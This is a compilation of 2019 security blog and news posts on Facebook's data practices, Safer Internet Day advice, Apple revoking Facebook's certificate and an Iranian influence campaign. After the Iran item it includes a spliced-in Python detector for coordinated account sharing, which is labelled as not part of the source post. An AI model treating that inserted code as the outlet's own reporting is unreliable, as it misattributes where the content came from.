But Facebook’s messaging changes have greater implications for online safety as consumers become more protective of their data. For example, WhatsApp only requires a phone number to sign up for the app while Facebook asks users to verify their identities. Will this force more data to be shared with WhatsApp, or will its encryption become less secure? While nothing has been finalized, it’s important for users to think about how the information they share online could be affected by this merge.

Although the internet has paved the way for advancements in social media and technology in general, users need to make sure they’re aware of the potential risks involved. And while this merge hasn’t happened yet, Safer Internet Day helps remind us to make good choices when it comes to browsing online. Following these tips can help keep you and your data safe and secure:

  • Get selective about what you share. Although social media is a great way to keep your friends and family in the loop on your daily life, be conservative about the information you put on the internet. Additionally, be cautious of what you send through messaging platforms, especially when it comes to your personally identifiable information.
  • Update your privacy settings. To make sure that you’re sharing your status with just your intended audience, check your privacy settings. Choose which apps you wish to share your location with and turn your profiles to private if you don’t want all users to have access to your information.
  • Keep your apps up-to-date. Keeping your social media apps updated can prevent exposure to threats brought on by software bugs. Turn on automatic updates so you always have the latest security patches, and make sure that your security software is set to run regular scans.
  • Click with caution. Cybercriminals can leverage social media messaging to spread phishing links. Don’t interact with users or messages that seem suspicious and keep your guard up by blocking unfamiliar users who try to send you sketchy content.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help block malware and phishing sites if you accidentally click on a malicious link. This can help protect you from potential threats when you access your social channels from a desktop or laptop.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

Safer Internet Day 2019 – Together for a Better Internet

What You Can Do Today to Help Create a Better Internet

Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire positive change and raise awareness about the importance of online safety.

The theme for 2019 is: ‘Together for a Better Internet’ which I believe is a timely reminder of the importance of us all working together if we are serious about making the internet a safer place. Whether we are parents, carers, teachers or just avid users, we all have a part to play.

The 4R’s of Online Safety

In order to make a positive change to our online world, this year we are being encouraged to focus on four critical skills that many experts believe will help us all (especially our kids) better navigate the internet and create a more positive online environment. Let’s call them the 4R’s of online safety: Respect, Responsibility, Reasoning and Resilience. So, here is my advice on what we can do to try and incorporate these four important skills into our family’s digital lives

  1. Respect – ‘I treat myself and others the way I like to be treated’

I firmly believe that having respect for others online is critical if we are going to foster a safer and more supportive internet for our children and future generations. While many parents realise that our constant reminders about the importance of good manners and respect must also now be extended to include the online world, not everyone is on the same page.

Keyboard warriors who fire off abusive comments online, or harass and troll others, clearly have no notion of online respect. Online actions can have serious real-world implications. In fact, online actions can often have more significant implications, because the dialogue is not contained to a few people but is witnessed by everyone’s online friends, which could stretch into the thousands. Such public exchanges then create the opportunity for commentary, which often further magnifies the hurt and fallout.

It is therefore essential that we have very direct conversations with our children about what is and isn’t appropriate online. And if there is even any confusion, always revert to one of my favourite lessons from my Sunday School days: treat others how you would like to be treated yourself.

  2. Responsibility – ‘I am accountable for my actions and I take a stand when I feel something is wrong’

In my opinion, teaching our kids online responsibility is another important step in making the internet a better place. Ensuring our kids understand that they are not only responsible but accountable for their behaviour is essential. If they harass or bully others online, or are involved in sending inappropriate pics, there are consequences that could quite possibly include interactions with the police.

But being responsible online also means getting involved if you feel something isn’t right. Whether a mate is on the receiving end of online harassment or a cruel joke, getting involved and telling the perpetrator that their behaviour ‘isn’t cool’ is essential.

  3. Reasoning – ‘I question what is real’

Teaching our kids to think critically is an essential survival skill in our content-driven online world. We need our kids to question, analyse and verify online content. They need to be able to identify reputable and credible sources and think carefully before they share and digest information.

The best thing we can do as parents is challenge our kids and get them thinking! If for example, your child is researching online for a school assignment then get them thinking. Ask them what agenda the author of the article has. Ask them whether there is a counter argument to the one laid out in the article. Ask them whether the source sharing the information is trustworthy. The aim is to teach them to question and not take anything they find online at face value.

  4. Resilience – ‘I get back up from tough situations’

Unfortunately, the chances that your child will experience some challenges online are quite high. Whether someone posts a mean comment, they are harassed, or, worst case, cyberbullied, these nasty online interactions can really hurt.

Ensuring your kids know that they can come to you about any issue they experience is essential. And you need to repeat this to them regularly, so they don’t forget! And if your child does come to you with a problem they experienced online, the worst thing you can do is threaten to disconnect them. If you do this, I guarantee you that they will never share anything else with you again.

In 2014, Parent Zone, one of the UK’s leading family digital safety organisations collaborated with the Oxford Internet Institute to examine ways to build children’s online resilience. The resulting report, A Shared Responsibility: Building Children’s Online Resilience, showed that unconditional love and respect from parents, a good set of digital skills plus the opportunity for kids to take risks and develop strategies in the online world – without being overly micro-managed by their parents – were key to building online resilience.

So, love them, educate them and give them some independence so they can start to take some small risks online and start developing resilience.

What Can You Do this Safer Internet Day?

Why not pledge to make one small change to help make the internet a better place this Safer Internet Day? Whether it’s modelling online respect, reminding your kids of their online responsibilities, challenging them to demonstrate reasoning when assessing online content or working with them to develop online resilience, just a few small steps can make a positive change.

The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

Facebook’s New Privacy Hires

The Wired headline sums it up nicely -- "Facebook Hires Up Three of Its Biggest Privacy Critics":

In December, Facebook hired Nathan White away from the digital rights nonprofit Access Now, and put him in the role of privacy policy manager. On Tuesday of this week, lawyers Nate Cardozo, of the privacy watchdog Electronic Frontier Foundation, and Robyn Greene, of New America's Open Technology Institute, announced they also are going in-house at Facebook. Cardozo will be the privacy policy manager of WhatsApp, while Greene will be Facebook's new privacy policy manager for law enforcement and data protection.

I know these people. They're ethical, and they're on the right side. I hope they continue to do their good work from inside Facebook.

A week in security (January 28 – February 3)

Last week, we ran another instalment of our interview-with-a-malware-hunter series, explained a FaceTime vulnerability, and took a deep dive into a new stealer. We also threw some light on a Houzz data breach, and on what exactly happened between Apple and Facebook.

Other cybersecurity news

  • Kwik Fit hit by malware: Car service specialist runs into trouble when systems go offline. (Source: BBC)
  • Mozilla publishes tracking policy: Mozilla fleshes out its vision of what is and isn’t acceptable in tracking land. (Source: Mozilla)
  • Distracting smart speakers: How you can effectively drown out your smart speaker with a bit of distraction. (Source: The Register)
  • Privacy attack aimed at 3/4/5G users: Theoretical fake mobile towers are back in business, with an investment in monitoring device owner activities. (Source: Help Net Security)
  • How my Instagram was hacked: A good warning about the perils of password reuse. (Source: Naked Security)
  • Social media identity thieves: Scammers will stop at nothing to pull some heartstrings and make a little money in the bargain. (Source: ABC news)
  • Another smart home hacked: A family recounts their horror at seeing portions of their home cut open for someone’s amusement. (Source: Komando)
  • Facebook mashup: Plans to combine Whatsapp, Instagram, and Facebook Messenger are revealed with security questions raised. (Source: New York Times)
  • Phishing attacks continue to rise: Worrying stats via security experts polled who agree in large numbers that phishing is at the same level or higher than it was previously. (Source: Mashable)
  • Researchers discover malware-friendly hosting service: After a spike in infections, researchers track things back to a host that looked like a “hornet’s nest of malware.” (Source: TechCrunch)

Stay safe, everyone!

The post A week in security (January 28 – February 3) appeared first on Malwarebytes Labs.

Jack Dorsey Tells Joe Rogan Bitcoin Will “Probably” Become Internet’s Native Currency

Twitter CEO Jack Dorsey talked up bitcoin in a big way this weekend when he appeared on the highly coveted Joe Rogan Experience. The long-time advocate of cryptocurrency said bitcoin will “probably” become the internet’s native currency in ten years’ time. Internet’s Native Currency Appearing on episode 1236 of the Joe Rogan Experience on Saturday, […]

The post Jack Dorsey Tells Joe Rogan Bitcoin Will “Probably” Become Internet’s Native Currency appeared first on Hacked: Hacking Finance.

Attorneys General in Six States Are Now Investigating Facebook’s Data Practices, Report Says

At least six state attorneys general have launched investigations into Facebook, Bloomberg is reporting. From a report: Two distinct groups have formed, according to Bloomberg's report: Pennsylvania and Illinois have joined Connecticut in an investigation of "existing allegations," though the report does not mention what those are. Officials in New York, New Jersey, and Massachusetts, "which were already known to be probing Facebook, are seeking to uncover any potential unknown violations," a source told the news agency. Bloomberg reported that a Facebook vice president of public policy, Will Castleberry, spun the news as the attorneys general just wanting to help Facebook out by suggesting new privacy initiatives or something. "We're having productive conversations with attorneys general on this important topic," Castleberry wrote in an email to Bloomberg. "Many officials have approached us in a constructive manner, focused on solutions that ensure all companies are protecting people's information, and we look forward to continuing to work with them."

Read more of this story at Slashdot.

Facebook Brings Express Wi-Fi To Ghana, Quietly Expands Free Basics To Morocco and Laos

More than a year after Facebook commercially launched Express Wi-Fi in five markets, it is ready to bring the connectivity service to a sixth: Ghana. From a report: In partnership with telecom operator Vodafone Ghana, Facebook today launched Express Wi-Fi, part of the Internet.org initiative, in suburban communities of the West African nation. The service, available locally in Nima, James Town, Kanda, Pig Farm, and Abossey Okine in the capital city Accra, will aim to offer "carrier-grade Wi-Fi" to people living in some remote communities that lack fiber optic cables. Ever since India booted Free Basics in early 2016, Facebook has seemingly grown cautious about its connectivity efforts. The company has stopped updating the social media page and press page of Internet.org. Last year, we learned that Facebook had quietly pulled Internet.org from a handful of emerging markets. In recent months, however, it has quietly expanded Internet.org to two new markets -- Morocco (in North Africa) and Laos (in Southeast Asia).

Read more of this story at Slashdot.

Apple Restores Facebook And Google Internal iOS Apps After Brief Punishment

The clashes between Facebook and Apple, and Google and Apple have made it to the news recently. Due to violations

Apple Restores Facebook And Google Internal iOS Apps After Brief Punishment on Latest Hacking News.

Cyber Security Week in Review (Feb. 1)

Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Apple revoked a set of developer tools from Facebook. The two tech companies got into a tug-of-war this week over a Facebook program, which came to light this week, that paid users to install a VPN on their mobile devices; Facebook then tracked users’ habits via the VPN. Facebook has now ended that program.
  • Apple temporarily disabled its group FaceTime service as it fixes a vulnerability. If exploited, an attacker could potentially listen in on conversations via Apple devices’ microphones even if the user doesn’t answer a FaceTime call. Apple’s slow response to this bug has prompted New York’s attorney general to launch an investigation.
  • The U.S. filed several criminal charges against Chinese tech company Huawei. One indictment accused Huawei of attempting to steal trade secrets from mobile company T-Mobile, while another says the company worked to bypass American sanctions against Iran.

From Talos

  • Attackers are utilizing a fake job posting from Cisco Korea to infect users. Based on our research, we believe this is the latest in a long string of attacks from the same threat actor.
  • There are multiple vulnerabilities in ACD Systems' Canvas Draw 5. The vulnerable component of Canvas Draw 5 lies in the handling of TIFF and PCX images. Snort rules 39593 - 39596, 39599 - 39632, 47336, 47337 can help protect you from the exploitation of these vulnerabilities.
  • Python.org contains an exploitable denial-of-service vulnerability in its X509 certificate parser. A specially crafted X509 certificate can cause a NULL pointer dereference, resulting in a denial of service. Snort rules 48854 and 48855 can protect you from the exploitation of this vulnerability.
  • Talos discovered two vulnerabilities that could allow remote code execution and memory disclosure at the kernel level in WIBU-SYSTEMS WibuKey. WibuKey is a USB key designed to protect software and intellectual properties. Snort rules 47750 and 47751 can protect you from the exploitation of these vulnerabilities. 

Malware roundup

  • The FormBook malware is back, this time targeting retail and hospitality companies. The information-stealer first appeared in 2016, and its use has recently risen through a new malware-hosting service.
  • The FBI and Air Force are working together to dismantle a North Korean botnet. Joanap is a remote access tool believed to be associated with the Lazarus Group APT. Snort rule 46885 can prevent Joanap from making an outbound connection.
  • A new cryptocurrency malware is targeting Macs. A variant of OSX.DarthMiner, the malware steals browser cookies and saved passwords in the Google Chrome web browser. 
  • American and Belgian authorities shut down an illegal online marketplace. xDedic, a website that concealed the location of its servers and was often used to sell personal information stolen in cyber attacks, is responsible for roughly $68 million of fraud.

The rest of the news

  • Google removed several data collection apps from the iOS App Store. The apps collected data from users’ phones, browsers and routers with their consent. In exchange, Google sent gift cards to the users. However, they did not properly operate under Apple’s developer enterprise program.
  • The United Arab Emirates has gathered a group of hackers to track adversaries of their government. Many of the members are former U.S. National Security Agency hackers. 
  • A group of 2.2 billion login credentials is circulating among hacking groups. This trove builds on a smaller collection that was uncovered by a security researcher earlier this year.
  • A distributed denial-of-service attack recently broke the record for packets sent per second. Security firm Imperva says they recently stopped an attack against their client that crossed the 500 million packets per second mark. 
  • Airbus employees’ data was accessed as the result of a recent data breach. The aerospace company says there was no impact to its commercial operations or intellectual property.
  • Chrome and Firefox fixed several security flaws in the latest versions of their browsers. Chrome 72 fixed 58 CVEs, including one that was rated “critical,” while Firefox patched seven CVEs, including three “critical” ones. 

Security Affairs: Facebook dismantled a vast manipulation campaign tied to Iran

Facebook took down hundreds of fake accounts from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

Facebook took down 783 inauthentic accounts, pages and groups from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

“The world’s biggest social network said it removed 783 pages, groups and accounts ‘for engaging in coordinated inauthentic behavior tied to Iran.’” reported the AFP Press.

The pages were part of a campaign to promote Iranian interests in various countries by creating fake identities as residents of those nations, according to a statement by Nathaniel Gleicher, head of cybersecurity policy at Facebook.


Facebook continues its efforts to prevent manipulation of its platform for fraudulent activities.

“We are constantly working to detect and stop this type of activity because we don’t want our services to be used to manipulate people,” Gleicher declared.

“We’re taking down these pages, groups and accounts based on their behavior, not the content they post. In this case, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”

Threat actors behind the campaign represented themselves as locals and posted news stories on current events. The accounts were used to discuss topics such as Israel-Palestine relations and the conflicts in Syria and Yemen.

“This morning we removed 783 Pages, groups and accounts for engaging in coordinated inauthentic behavior tied to Iran. There were multiple sets of activity, each localized for a specific country or region, including Afghanistan, Albania, Algeria, Bahrain, Egypt, France, Germany, India, Indonesia, Iran, Iraq, Israel, Libya, Mexico, Morocco, Pakistan, Qatar, Saudi Arabia, Serbia, South Africa, Spain, Sudan, Syria, Tunisia, US, and Yemen.” wrote Nathaniel Gleicher.

“The Page administrators and account owners typically represented themselves as locals, often using fake accounts, and posted news stories on current events. This included commentary that repurposed Iranian state media’s reporting on topics like Israel-Palestine relations and the conflicts in Syria and Yemen, including the role of the US, Saudi Arabia, and Russia.”

In some cases, the activity carried out by the fake accounts dates back to 2010.

Facebook pointed out that although threat actors attempted to hide their identities, the manual review of the activities associated with these accounts allowed them to identify the coordinated inauthentic behavior from Iran.

The campaign, active as early as 2010, involved 262 Pages, 356 accounts, and three groups on Facebook, as well as 162 accounts on Instagram.

According to Facebook, about 2 million accounts followed at least one of the above pages, about 1,600 accounts joined at least one of the groups, and more than 254,000 accounts followed at least one of these Instagram accounts.

The social network giant reported that the operators spent less than $30,000 on ads on Facebook and Instagram, paid for primarily in US dollars, UK pounds, Canadian dollars, and euros.

“We identified some of these accounts through our continued investigation into Iranian coordinated inauthentic behavior we found and removed last year.” concludes Gleicher.

“Our investigation was aided by open source reporting and information provided to us by our industry peers. We have shared information about our investigation with US law enforcement, the US Congress, and policymakers in impacted countries. “

Pierluigi Paganini

(SecurityAffairs – Facebook, manipulation campaign)

The post Facebook dismantled a vast manipulation campaign tied to Iran appeared first on Security Affairs.
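Gleicher's statement is explicit that the takedown was based on behaviour (accounts coordinating with one another and misrepresenting who they were), not on the content posted. The detector below is an added example of what such a behavioural signal looks like in code; it is not Facebook's method and is not from the Security Affairs post. It looks for pairs of accounts that repeatedly push the same links within seconds of each other and merges flagged pairs into clusters. The post records are constructed for the example; the 60-second window and the two-link minimum are assumptions you would tune against your own data.

```python
from collections import defaultdict
from itertools import combinations

# Constructed sample: (account, unix timestamp, url shared). Three accounts push the
# same two links within a minute of each other; two others share links independently.
SAMPLE_POSTS = [
    ("alpha",   1000, "https://news.example/story-1"),
    ("bravo",   1020, "https://news.example/story-1"),
    ("charlie", 1045, "https://news.example/story-1"),
    ("delta",   9000, "https://news.example/story-1"),   # same link, hours later
    ("alpha",   5000, "https://news.example/story-2"),
    ("bravo",   5030, "https://news.example/story-2"),
    ("charlie", 5050, "https://news.example/story-2"),
    ("delta",  20000, "https://news.example/story-2"),
    ("echo",    5010, "https://news.example/story-3"),   # only sharer of this link
]


def coordinated_pairs(posts, window=60, min_shared=2):
    """Account pairs that posted at least `min_shared` distinct URLs within `window`
    seconds of each other. Returns {(acct_a, acct_b): set(urls)}."""
    by_url = defaultdict(list)
    for account, ts, url in posts:
        by_url[url].append((ts, account))
    pair_urls = defaultdict(set)
    for url, events in by_url.items():
        events.sort()                       # combinations() then yields t1 <= t2
        for (t1, a1), (t2, a2) in combinations(events, 2):
            if a1 != a2 and t2 - t1 <= window:
                pair_urls[tuple(sorted((a1, a2)))].add(url)
    return {pair: urls for pair, urls in pair_urls.items() if len(urls) >= min_shared}


def clusters(pairs):
    """Merge flagged pairs into account clusters (union-find); sorted for stable output."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    for a, b in pairs:
        parent[find(a)] = find(b)
    groups = defaultdict(set)
    for account in list(parent):
        groups[find(account)].add(account)
    return sorted(sorted(g) for g in groups.values())


if __name__ == "__main__":
    flagged = coordinated_pairs(SAMPLE_POSTS)
    for pair, urls in sorted(flagged.items()):
        print(pair, len(urls), "shared links")
    print("clusters:", clusters(flagged))
```

The obvious false positive is genuine breaking news, where thousands of unrelated accounts share one link within a minute; requiring the same pair to co-share several distinct links, and weighting rare links above viral ones, is what separates a network from a crowd. Delta in the sample shares both links but hours later, and is correctly left out.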

Twitter follow bots cut off from API, as accounts disabled for spreading misinformation from Iran and elsewhere

ManageFlitter, Statusbrew, and Crowdfire have had their access to the Twitter API revoked for allegedly helping users abuse the service, aggressively and repeatedly following and unfollowing large numbers of other accounts - a tactic frequently employed by Twitter spammers.

Meanwhile, Twitter and Facebook share details of the accounts they have shut down after finding they were spreading misinformation in the run-up to the US midterm elections.

Fake News Sites Are Changing Their Domain Name To Get Around Facebook Fact-Checkers

An anonymous reader quotes a report from Mashable: In order to avoid Facebook's fact checking system, the site formerly known as YourNewsWire, one of the most well-known purveyors of fake news online, has simply rebranded. The site now goes by News Punch and posts fake news content similar to what it published under its former name, according to a report by Poynter. YourNewsWire co-founders Sinclair Treadway and Sean Adl-Tabatabai, who reside in California, founded the site in 2014. The two completely migrated the website from the "yournewswire.com" domain name to "newspunch.com" in November 2018. Treadway told Bloomberg at the time that the move was made due to declining revenue thanks to Facebook's fact-checking system. Under this program, fact-checking outlets like Snopes are able to mark content posted on Facebook as false, which in turn decreases the site's reach on Facebook. According to the investigation, the workaround has been a success. Content that Poynter itself had found to be previously marked false on "yournewswire.com" was ported over to the "newspunch.com" domain. When shared on Facebook, that same fake news content that now lived on "newspunch.com" was not marked as false under the fact-checking program. Facebook is reportedly rolling out features to thwart the site's workaround.

Read more of this story at Slashdot.

Stocks Extend Best Month Since 2015; S&P 500 Clinches Best January Since 1987

U.S. stocks finished higher on Thursday, as the S&P 500 rounded out its best January in 32 years on the back of strong corporate earnings. Cryptocurrencies turned defensive in afternoon trading as XRP failed to sustain a double-digit rally that began midweek. Stocks Close January in Positive Territory The S&P 500 Index rose 0.9% to […]

The post Stocks Extend Best Month Since 2015; S&P 500 Clinches Best January Since 1987 appeared first on Hacked: Hacking Finance.

Apple revokes Facebook’s enterprise certificate due to misuse of customers’ personal data

Reports surfaced revealing Facebook were paying individuals to permit it to watch everything they were doing. This action was allowing

Apple revokes Facebook’s enterprise certificate due to misuse of customers’ personal data on Latest Hacking News.

Apple pulls Facebook enterprise certificate

It’s been an astonishing few days for Facebook. They’ve seen both an app and their enterprise certificate removed and revoked with big consequences.

What happened?

Apple issues enterprise certificates to organizations so that they can create internal apps. Those apps don’t end up released on the Apple store, because the terms of service don’t allow it. Anything storefront-bound must go through the mandatory app checks by Apple before being loaded up for sale.

What went wrong?

Facebook put together a “Facebook research” market research app using the internal process. However, they then went on to distribute it externally to non-Facebook employees. And by “non Facebook employees” we mean “people between the ages of 13 to 35.” In return for access to large swathes of user data, the participants received monthly $20 gift cards.

The program was managed via various Beta testing services, and within hours of news breaking, Facebook stated they’d pulled the app.

Problem solved?

Not exactly. Apple has, in fact, revoked Facebook’s certificate, essentially breaking all of their internal apps and causing major disruptions for their 33,000 or so employees in the process. As per the Apple statement:

We designed our Enterprise Developer Program solely for the internal distribution of apps within an organization. Facebook has been using their membership to distribute a data-collecting app to consumers…a clear breach of their agreement.

Whoops

Yes, whoops. Now the race is on to get things back up and running over at Facebook HQ. Things may be a little tense behind the scenes due to, uh, something similar involving a VPN-themed app collecting data it shouldn’t have been earlier this year. That one didn’t use the developer certificate, but it took some 33 million downloads before Apple noticed and decided to pull the plug.

Could things get any worse for Facebook?

Cue Senator Ed Markey, with a statement on this particular subject:

“It is inherently manipulative to offer teens money in exchange for their personal information when younger users don’t have a clear understanding of how much data they’re handing over and how sensitive it is,” said Senator Markey. “I strongly urge Facebook to immediately cease its recruitment of teens for its Research Program and explicitly prohibit minors from participating. Congress also needs to pass legislation that updates children’s online privacy rules for the 21st century. I will be reintroducing my ‘Do Not Track Kids Act’ to update the Children’s Online Privacy Protection Act by instituting key privacy safeguards for teens.

But my concerns also extend to adult users. I am alarmed by reports that Facebook is not providing participants with complete information about the extent of the information that the company can access through this program. Consumers deserve simple and clear explanations of what data is being collected and how it is being used.”

Well, that definitely sounds like a slide towards “worse” instead of “better.”

A one-two punch?

Facebook has already drawn heavy criticism this past week for the wonderfully-named “friendly fraud” practice, in which kids make dubious purchases and chargebacks follow. It happens, sure, but perhaps not quite like this. From the linked Register article:

Facebook, according to the full lawsuit, was encouraging game devs to build Facebook-hosted games that allowed children to input parents’ credit card details, save those details, and then bill over and over without further authorisation.

While large amounts of money were being spent, some refunds proved to be problematic. Employees were querying why most apps with child-related issues are “defaulting to the highest-cost setting in the purchase flows.” You’d better believe there may be further issues worth addressing.

What next?

The Facebook research program app will continue to run on Android, which is unaffected by the certificate antics. There’s also this app from Google in Apple land which has since been pulled due to also operating under Apple’s developer enterprise program. No word yet as to whether or not Apple will revoke Google’s certificate, too. It could be a bumpy few days for some organizations as we wait to see what Apple does next. Facebook, too, could certainly do with a lot less bad publicity as it struggles to regain positive momentum. Whether that happens or not remains to be seen.

The post Apple pulls Facebook enterprise certificate appeared first on Malwarebytes Labs.

Google also abused its Apple developer certificate to collect iOS user data

It turns out that Google, like Facebook, abused its Apple Enterprise Developer Certificate to distribute a data collection app to iOS users, in direct contravention of Apple’s rules for the distribution program. Unlike Facebook, though, the company did not wait for Apple to revoke its certificate. Instead, it quickly disabled the app on iOS devices, admitted its mistake and extended a public apology to Apple. Google’s app Google’s Screenwise Meter app is very similar … More

The post Google also abused its Apple developer certificate to collect iOS user data appeared first on Help Net Security.

Kaspersky Lab official blog: Transatlantic Cable podcast, episode 76

In the 76th edition of the Kaspersky Lab Transatlantic Cable Podcast, David and I cover a number of stories pertaining to privacy and, surprisingly, browsers. To start things off, we look at the issue that Apple faced earlier in the week, where a bug in FaceTime that was reported by a kid wound up in the public eye.

Following that tale, we jump into a stranger-than-fiction story about Facebook and their controversial tactic to have users install a VPN to share their data with Facebook. The kicker is that the target audience included kids.

Following Facebook, we stay on the privacy bandwagon and look at the work that Mozilla did to improve the latest version of Firefox. We close out the podcast bidding happy trails to Internet Explorer 10. If you like the podcast, please consider sharing with your friends or subscribing below; if you are interested in the full text of the articles, please click the links below.




Smashing Security #113: FaceTime, Facebook, faceplant

FaceTime bug allows callers to see and hear you *before* you answer the phone, Facebook’s Nick Clegg tries to convince us the social network is changing its ways, and IoT hacking is big in Japan.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes from AMTSO.

Facebook to become world’s biggest ‘virtual graveyard’ by the end of this century

Have you kept your digital will ready, as about 8,000 Facebook users die daily

Facebook will have more profiles of dead people than those of alive users by the end of this century. The social media giant, which currently has over 2 billion users worldwide, is set to become the world’s ‘biggest virtual graveyard’ by 2098, as nearly 8,000 Facebook users die every day.

Currently, when a user dies, Facebook does not delete the account automatically and instead turns it into a “memorialized” version. The only way to delete the account of a dead person is for someone to log in with the password and close it down. Accounts that are not handled by someone else continue to remain on the site.

In such a scenario, what happens to our digital possessions once we die? Basically, these situations should make digital platforms realize the need to transfer digital assets, such as personal photos, videos and friendly posts to the family once a Facebook user is no more.

“When someone dies leaving behind his email and social media accounts, the same are movable property and that being so, any heirs of the concerned person can seek right to access the same,” says Pavan Duggal, one of the nation’s top cyberlaw experts.

Facebook allows users to appoint a “Legacy Contact” before they die, which can either be a family member or a friend. “Once someone lets us know that a person has passed away, we will memorialize the account,” says Facebook.

Once the user passes away, the legacy contact can manage the page by writing a post to display at the top of the memorialized Timeline. The contact can even approve new friend requests and update the cover and profile photos. If one wants, he or she may give the legacy contact permission to download an archive of the photos, videos, wall posts, profile and contact info, friends list, and events they shared on Facebook.

However, the legacy contact will not be able to log in as the deceased user, read that person’s private messages, remove any of his or her friends, or make new friend requests. Alternatively, one can notify Facebook about the member’s death and request that the account be permanently deleted.

A “digital heir” can keep precious social media moments of the deceased and gift those to future generations via tools such as an external hard disk, Cloud storage, pen drive or DVDs. The said heirs can ask the digital/social media companies to get access after giving the necessary proof.

“Invariably, the service provider may not be inclined to give such access without any requisite order from the court of competent jurisdiction. This could mean getting a succession certificate from a court of competent jurisdiction which could be a time-consuming process,” Duggal told IANS.

Besides Facebook, several social media platforms, such as Twitter, Instagram, WhatsApp, Snapchat, YouTube, Reddit and others too have millions of users.

For instance, Google, owner of Gmail, YouTube and Picasa web albums, has an “Inactive Account Manager” feature that allows you to inform Google what to do with your data after you pass away, whether you want to share it with family and friends or delete it altogether.

It allows a user to propose who has access to his or her information. If a user’s account has been inactive for a while, their accounts can be deleted or shared with a nominated person.

According to Twitter, “In the event of the death of a Twitter user, we can work with a person authorized to act on behalf of the estate or with a verified immediate family member of the deceased to have an account deactivated.”

However, Twitter says that “we are unable to provide account access to anyone regardless of his or her relationship to the deceased”.

Instagram, like Facebook, memorializes accounts. However, they cannot be changed and no one can log into the profile. It instead asks the deceased user’s friends and relatives to get in touch via email, notify it that the user is no more, and submit proof of death. On the other hand, Apple iCloud and iTunes accounts are “non-transferable”, which means that when a user is no more, any rights to the information in his or her account cease.

The post Facebook to become world’s biggest ‘virtual graveyard’ by the end of this century appeared first on TechWorm.

Security Affairs: Facebook paid teens $20 to install a Research App that spies on them

Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via their mobile devices.

2018 was a terrible year for Facebook, which was in the middle of the Cambridge Analytica privacy scandal. The social network giant was involved in other cases; for example, it was forced to remove its Onavo VPN app from Apple’s App Store because it was caught collecting data through Onavo Protect, the Virtual Private Network (VPN) service that it acquired in 2013.

According to a report presented by Privacy International in December at the 35C3 hacking conference held in Germany, the list of Android apps that send tracking and personal information back to Facebook includes dozens of apps, including Kayak, Yelp, and Shazam.

Now, according to a report published by TechCrunch, Facebook is paying teenagers around $20 a month to use its VPN app, which monitors their activity on their mobile devices.

Facebook is accused of using the VPN app to track users’ activities across multiple different apps, especially the use of third-party apps.

“Desperate for data on its competitors, Facebook has been secretly paying people to install a ‘Facebook Research’ VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August.” reads the report published by TechCrunch.

“Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms.”

TechCrunch reported that some documentation refers to the Facebook Research program as “Project Atlas,” and added that Facebook confirmed the existence of the app.

The news is disconcerting: despite the privacy cases in which Facebook has been involved, the company has been paying users aged 13 to 35 as much as $20 per month plus referral fees for installing Facebook Research on their iOS or Android devices. The company described the ‘Facebook Research’ app as a “paid social media research study.”

Facebook is distributing the app via third-party beta testing services Applause, BetaBound, and uTest that were also running ads on Instagram and Snapchat recruiting participants to install Facebook Research.

Let’s take a closer look at the Facebook Research App. The app requires users to install a custom root enterprise certificate, which allows the social media giant to collect private messages in social media apps, chats from instant messaging apps, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps installed on the users’ devices.

Experts pointed out that in some cases the Facebook Research app also asked users to take screenshots of their Amazon order histories and send them back to Facebook.

The Applause site gives more information on how the company could use the data:

“By installing the software, you’re giving our client permission to collect data from your phone that will help them understand how you browse the internet, and how you use the features in the apps you’ve installed . . . This means you’re letting our client collect information such as which apps are on your phone, how and when you use them, data about your activities and content within those apps, as well as how other people interact with you or your content within those apps. You are also letting our client collect information about your internet browsing activity (including the websites you visit and data that is exchanged between your device and those websites) and your use of other online services. There are some instances when our client will collect this information even where the app uses encryption, or from within secure browser sessions.” the terms read.

Facebook confirmed that the app was developed for research purposes, in particular to study how people use their mobile devices.

“like many companies, we invite people to participate in research that helps us identify things we can be doing better.” explained Facebook.

“helping Facebook understand how people use their mobile devices, we have provided extensive information about the type of data we collect and how they can participate. We do not share this information with others, and people can stop participating at any time.”

Facebook’s spokesperson claimed that the app doesn’t violate Apple’s Enterprise Certificate program. TechCrunch points out that since Apple requires developers to use this certificate system only for distributing internal corporate apps to their own employees, “recruiting testers and paying them a monthly fee appears to violate the spirit of that rule.”

After the disclosure of the report, Facebook announced that it is planning to shut down the iOS version of the Facebook Research app.

Pierluigi Paganini

(SecurityAffairs – Facebook Research app, Privacy)

The post Facebook paid teens $20 to install a Research App that spies on them appeared first on Security Affairs.




Apple Says It’s Banning Facebook’s Research App That Collects Users’ Personal Information

